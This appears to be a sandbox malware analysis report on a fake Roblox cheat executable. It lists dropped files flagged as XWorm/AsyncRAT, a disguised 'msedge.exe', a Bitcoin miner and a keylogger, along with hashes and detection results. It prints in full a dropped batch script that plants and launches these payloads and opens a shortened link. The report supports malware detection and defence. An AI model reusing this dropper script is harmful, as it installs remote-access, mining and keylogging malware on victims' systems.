                                                                            Preview:##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk

                                                                            C:\Users\user\AppData\Local\Temp\ msedge.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):166912
                                                                            Entropy (8bit):6.251413929646261
                                                                            Encrypted:false
                                                                            SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                            MD5:D653AEF66E218FB009B43365919BBCE3
                                                                            SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                            SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                            SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Joe Sandbox View:
                                                                            • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                            • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......L............................................................................ ............... ..H............text....... ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):140288
                                                                            Entropy (8bit):5.566968845764678
                                                                            Encrypted:false
                                                                            SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                            MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                            SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                            SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                            SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Joe Sandbox View:
                                                                            • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                            • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......<....................`....................................................... ............... ..H............text....... ...................... ..`.rsrc...<...........................@..@.reloc.......`......."..............@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                            C:\Users\user\AppData\Local\Temp\Keyloger.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):168960
                                                                            Entropy (8bit):5.30703099621005
                                                                            Encrypted:false
                                                                            SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                            MD5:520E97797B27B752130B3E982953CEAF
                                                                            SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                            SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                            SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?[.f............................."... ...@....@.. ....................................@.................................X"..S....@..Z............................................................................ ............... ..H............text........ ...................... ..`.rsrc...Z....@......................@..@.reloc..............................@..B................."......H........]..........&.....................................................(....*.r...p*. .x!.*..(....*.rc..p*. !...*.s.........s.........s.........s.........*.r...p*. .&..*.r'..p*. ~.H.*.r...p*. .(T.*.r...p*. ..$.*.rM..p*. C.?.*..((...*.r_..p*. [...*.r...p*. .A..*"(....+.*&(....&+.*.+5sR... .... .'..oS...(,...~....-.(G...(9...~....oT...&.-.*.r%..p*. S...*.ri..p*. ....*.r...p*.r...p*. ....*.r5..p*. *p{.*.ry..p*. ...*..............j..................sU..............*"(I...+.*:

                                                                            C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5720984
                                                                            Entropy (8bit):6.362394353465928
                                                                            Encrypted:false
                                                                            SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                            MD5:27469372591B14FF1C57654FACB5E020
                                                                            SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                            SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                            SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..................M.....M...P.....9.......................9...M.....+.....M.....T............M.......O...T...(...T.;...S...T.....Rich....................PE..L................"......b4......... (/.......4...@..........................`......`/X...@.................................D.B.T....0..............."W..)......<[....@.p.....................@.......@.@.............4.<............................text...v`4......b4................. ..`.rdata..Rs....4..t...f4.............@..@.data....+....C..*....B.............@....rsrc........0........O.............@..@.reloc..<[.......\....T.............@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\coin.bat

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):477
                                                                            Entropy (8bit):5.082252715861135
                                                                            Encrypted:false
                                                                            SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5i1bhH0HR:ZMz0zsBiO4Z+O4ZOKoQR
                                                                            MD5:AAA81C149A8D65AC899AF053ECF582BC
                                                                            SHA1:A784DDE9304A2B8108180A652C9374BEF71500D9
                                                                            SHA-256:98818D1694AE946A32DEC4CAEA1FDD219650EF5A915CCA6A68E974C028A2FD69
                                                                            SHA-512:74B6B9A1EF22CE12E3CE5076C8A3B6D0BE1C52642C6E004D52255D23AFD3506496D84049CDF6F5E37F5238C5645E014E26D88046D196CDBD3DDA90B3A27BEA92
                                                                            Malicious:false
                                                                            Preview:%echo off..copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application..start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6..start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner..copy %temp%\Keyloger.exe %systemDrive%..start %systemDrive%\Keyloger.exe..start cmd..start https://2no.co/24RXx6

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dll

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2877728
                                                                            Entropy (8bit):6.868480682648069
                                                                            Encrypted:false
                                                                            SSDEEP:49152:GB6BoH5sOI2CHusbKOdskuoHHVjcY94RNETO2WYA4oPToqnQ3dK5zuqvGKGxofFo:M67hlnVjcYGRNETO2WYA4oLoqnJuZI5
                                                                            MD5:477C17B6448695110B4D227664AA3C48
                                                                            SHA1:949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
                                                                            SHA-256:CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
                                                                            SHA-512:1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....fd.........." ......(..........A&.......................................,.......,...`A.........................................V*......V*......`,......`+..p....+. )...p,......D*.8....................C*.(.....(.8...........p\*..............................text.....(.......(................. ..`.rdata..h.....(.......(.............@..@.data....l....*..&....*.............@....pdata...p...`+..r....*.............@..@.00cfg..(.....+......p+.............@..@.gxfg....$....+..&...r+.............@..@.retplnel.... ,.......+..................tls.........0,.......+.............@....voltbl.D....@,.......+................._RDATA.......P,.......+.............@..@.rsrc........`,.......+.............@..@.reloc.......p,.......+.............@..B........................................................................................................................................

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\_metadata\verified_contents.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1778
                                                                            Entropy (8bit):6.02086725086136
                                                                            Encrypted:false
                                                                            SSDEEP:48:p/hCdQAdJjRkakCi0LXjX9mqjW6JmfQkNWQzXXf2gTs:RtQ1aaxXrjW6JuQEWQKas
                                                                            MD5:3E839BA4DA1FFCE29A543C5756A19BDF
                                                                            SHA1:D8D84AC06C3BA27CCEF221C6F188042B741D2B91
                                                                            SHA-256:43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
                                                                            SHA-512:19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
                                                                            Malicious:false
                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJHb29nbGUuV2lkZXZpbmUuQ0RNLmRsbCIsInJvb3RfaGFzaCI6Im9ZZjVLQ2Z1ai1MYmdLYkQyWFdBS1E5Nkp1bTR1Q2dCZTRVeEpGSExSNWMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiYk01YTJOU1d2RkY1LW9Tdml2eFdqdXVwZ05pblVGakdPQXRrLTBJcGpDZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Im5laWZhb2luZGdnZmNqaWNmZmtncG1ubHBwZWZmYWJkIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjI3MzguMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"KTPeHzS0ybFaz3_br3ASYWHjb6Ctul92067u2JMwtNYYm-4KxLiSkJZNBIzhm6hNSEW2p5kUEvHD0TjhhFGCZnWm9titj2bqJayCOAGxZb5BO74JJCRfy5Kwr1KSS4nvocsZepnHBmCiG2OV3by-Lyf1h1uU3X3bDfD92O0vJzrA8rwL2LrwIk-BolLo5nlM0I_MZwg8DhZ8SFBu9GGRVB2XrailDrv4SgupFE9gqA1HY6kjRjoyoAHbRRxZdBNNt9IKNdxNyaF9NcNRY8dAedNQ9Tw3YNp5jB7R9lcjO4knn58RdH2h_GiJ4l96StcXA4e7cqbJ77P-c

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\manifest.fingerprint

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.974403644129192
                                                                            Encrypted:false
                                                                            SSDEEP:3:SLVV8T+WSq2ykFDJp9qBn:SLVqZS5p0B
                                                                            MD5:D30A5BBC00F7334EEDE0795D147B2E80
                                                                            SHA1:78F3A6995856854CAD0C524884F74E182F9C3C57
                                                                            SHA-256:A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
                                                                            SHA-512:DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
                                                                            Malicious:false
                                                                            Preview:1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\manifest.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):145
                                                                            Entropy (8bit):4.595307058143632
                                                                            Encrypted:false
                                                                            SSDEEP:3:rR6TAulhFphifFooG+HhFFKS18CWjhXLXGPQ3TRpvF/FHddTcplFHddTcVYA:F6VlM5PpKS18hRIA
                                                                            MD5:BBC03E9C7C5944E62EFC9C660B7BD2B6
                                                                            SHA1:83F161E3F49B64553709994B048D9F597CDE3DC6
                                                                            SHA-256:6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
                                                                            SHA-512:FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
                                                                            Malicious:false
                                                                            Preview:{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\_metadata\verified_contents.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1796
                                                                            Entropy (8bit):6.030369721181362
                                                                            Encrypted:false
                                                                            SSDEEP:24:pZRj/flTT479GpqYNJpFTN+R7aoXaBOs9pbt5dWpuck0iXfkhApoXB2XktSqDhs:p/hcI1NJpFN+R7aka8s9pbwp+zpkntI
                                                                            MD5:4CE34645BA96EBAAFF71D8B9ED570881
                                                                            SHA1:7DD920E922A66E276CFE162B4D51D0EE862321FD
                                                                            SHA-256:8453F66B3179AB56365D2C053F73AD5F90CDDC344EA09F88CBA77D9199E1291D
                                                                            SHA-512:1F3E116B3DBAFCEAC4C8E0958431218281A6647F8BC8AFA742B2C759CD368A3A9551BEE284D5971DE004ABC88C810B82DF372BAA38AA549899D79B2460A9D493
                                                                            Malicious:false
                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJjcl9lbi11c181MDAwMDBfaW5kZXguYmluIiwicm9vdF9oYXNoIjoiSk1lV2tjZGhCUU1oeWRlaHZRb0FuSERMSFBsQzdJOVVsdEJlNjgtVFpwRSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJRY1FWSnVxWVI4Z1ZkQmJ5UV80ajFCVVByQk1IV3VVMU54d0dsQ3dzNTNBIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoib2JlZGJiaGJwbW9qbmthbmljaW9nZ25tZWxtb29tb2MiLCJpdGVtX3ZlcnNpb24iOiIyMDI0MDcxNy42NTU3MzUxMTEuMTQiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"cFVKRo2tjxiswevP87SsuYLgVYsgnfQL_ysvzdN4M6c7aTT6EfHhmHSE9zG51EXktxeBFhKrWp57K1_7L6UlvfMtnk-dX5wLsnLruPvt8NPkhUYAK0fH41tzBzMa-g2-vpj7FLrfzjucn9DoZEBNJptsV9wY-wCMlBI9d6HhrRrx6wClkhkZCxVauqtaOTdwMCgNT6bKakgu4ky2pO-Fs4LNXv7p7fw5uoF3Q73BMloQGruZRoId7z826DoHq1M6LXE_PK8LF3GuSoYP2z8MZUHdUY25H4xM8BvlehhWH4cuqsp8076nT2X39Fa

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\cr_en-us_500000_index.bin

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):7883519
                                                                            Entropy (8bit):6.572648868768043
                                                                            Encrypted:false
                                                                            SSDEEP:98304:zP9pZvIxJcGGgPFckavBTC0fxiR9AEosZWD:zFW/QZxiROPD
                                                                            MD5:F1F7280460CB0976FDBFBC9E809000EC
                                                                            SHA1:99A5AB5B99482A7ED596C9C664C2A1755B215D85
                                                                            SHA-256:A49478B4959707E94BAA235551FAE89089386CD962D906F78A36553E371F358C
                                                                            SHA-512:2A43B2B89506FC3D82CCC413A78F9A670D0B99838F990DC68B6B7A899E68A68D96734EADCCAA3EB4069898003B7574659FDD1D85AD11C89CB2C42CECD94B91A0
                                                                            Malicious:false
                                                                            Preview:......w]....h.z...a.U#..ye.0..f. 2..rG.:..t.WC..g..Q..cC.Y..l..n..d..v..e.8...i.t...p.V...m.$...uqU...b.Q...s.f...o.....n.6...z.....v3....kO....xAt...1k....j.....q.....5AM...2U....47....9.....3.1...7a....6.....8.3...0.f....[n...._u...*.v.....v.....w...&]{....3|.....|....C}............. .....%.... ....... . ........./......C....$........ #........................... .......:... to usdp:..-%...... meaning*,...K...................)....../..... .... ........^........... meaning....#......... ......B...(...... meaning................l...@......-8-tetrahydrocannabinol.r.... meaning.Q.'......... ...........4.... meaning.+...dgar guzm.n l.pez...........:....U...... meaning6..........5...... meaning"3..... ..... .......&.... meaningR%. . .... ................. ................ meaning..... meaning......

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\manifest.fingerprint

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.85910606118318
                                                                            Encrypted:false
                                                                            SSDEEP:3:STAE4+g6KQXTKth2vaUDXHuIRQyTcn:SzghQDKSvaaX0yQ
                                                                            MD5:9AFC3C6A8D9349FCB25061F1A9BD2028
                                                                            SHA1:2569EDDE33E0F02C4D57A625DF0FB324856CEA86
                                                                            SHA-256:7C418C921DE2AF6C70D526A1EAE6A0F133E0D10F538B345A365C3FE2B3686CB2
                                                                            SHA-512:719E56123C5F9D134CBEF107AC4D595C07C3D623D29E3F39B8FD8983050ADAEE8C1AA7228B33A6EC9D8C44F4CDC6464A4B748BAD75E4A15EACD22F5EEC5387CB
                                                                            Malicious:false
                                                                            Preview:1.6eafa0a2352ea31bac3d85266c994edc453fc434eb11f2bab1445dea22c0ff69

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\manifest.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):108
                                                                            Entropy (8bit):4.880870753312092
                                                                            Encrypted:false
                                                                            SSDEEP:3:rR6TAulhFphifF0AAGAR3CKG/w/VpKS1802Qc6vY:F6VlMT2C7Y/VUS1802Qc6A
                                                                            MD5:91B1C49B99FE2B26C28B2027A08CE05C
                                                                            SHA1:2BBF126EA07204A4877D777B358C6E6A327AB943
                                                                            SHA-256:41C41526EA9847C8157416F243FE23D4150FAC13075AE535371C06942C2CE770
                                                                            SHA-512:069B05CAEFC788303A6EB07CC3578A7AD080979653BE08E51B5BFD359DF158C2F12C587B3CEA3D26B62EA2504E5ED46A5EA64B5D72B08BE689A5CFF81C823C46
                                                                            Malicious:false
                                                                            Preview:{. "manifest_version": 2,. "name": "OnDeviceHeadSuggestENUS500000",. "version": "20240717.655735111.14".}

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\LICENSE

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1558
                                                                            Entropy (8bit):5.11458514637545
                                                                            Encrypted:false
                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                            Malicious:false
                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\_metadata\verified_contents.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1864
                                                                            Entropy (8bit):5.993417646222111
                                                                            Encrypted:false
                                                                            SSDEEP:48:p/hUI1JfE4hAdIs7akUEQNV3N8kIL8F64leu38k7ObMARcqk:RnqOQIs7azN/8n4leus+cMASqk
                                                                            MD5:2295CEA75E046B34E7209F41B03CEC14
                                                                            SHA1:1099DCE991021E31A33BD12106E4FD23AA763D33
                                                                            SHA-256:B2EDA3181D68EFAA7AC3EE4DAC3207F922CCA956186A7AFBFB8E88A64E84BB3F
                                                                            SHA-512:FBEAA1FFF2FBAFD6FD3A5076DDC4F5DAC024EAB72C3061BE3F32EB5D6F8883DF028254824790A0471FFB57D0314DB733F3AE9E2E8CD423B78EAF5D847C2CF4B7
                                                                            Malicious:false
                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJvQmp4YVZsV3F1dUkxdzlKYlQ0UlhFZmttVEhhZXVTTERmUFJBampNSEZvIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiS3ozY3VUdElhV19tRTdMVFBCbjJjNjZFU3lMU0h6cjZ4ZlR3cTJUOWpWNCJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC43LjI0LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"Tb3KbakxQ7jCiQVNM3hHmD_sN_hsrrVLeHjVlQpZwClc3YsSNdA-uTFjuDUFMaben6A8BtQ0I5ss9jWubbnWjhTKJqkcEjnto4ezBoeTCu0Zv9jePpCWukxxol212y04us_R7pQLG5AtuFRi6p8H6VUH_aiWlXIaDEzAj1JEHiezaEvXnRKbQ7xZmjQISch8gwSzW_rx3OHst-ABowS9-qOjaLhWFtAgBXn4OyvNM9zoF9_pIPm3hxQ

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\manifest.fingerprint

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.967367379785099
                                                                            Encrypted:false
                                                                            SSDEEP:3:Sc4EddulfeAQQgBD4RdNRWS3Ug5:Sc4EddulfeAQtDsfVEi
                                                                            MD5:D981AE71ED66833759DDCCEC52FB948A
                                                                            SHA1:E0DB4693A7B1BB80C9D3DE020273728F32389574
                                                                            SHA-256:679A53419459DF7FE54CCC32F752D38A15CD6856FFFC9086C29EF7B7D8E2C7CB
                                                                            SHA-512:3F86B3363BC1A906C899035CDE4E8A89828EE274C17B92C6F88CEAB912FB043B5544925B33914DF8452F52DB0802427B03D2F674500A8340609FCB54026F997B
                                                                            Malicious:false
                                                                            Preview:1.90748cb88f02e4d2a3ff9262e55bedfdb57069486d4c383744c4bdbe3c7ea7ca

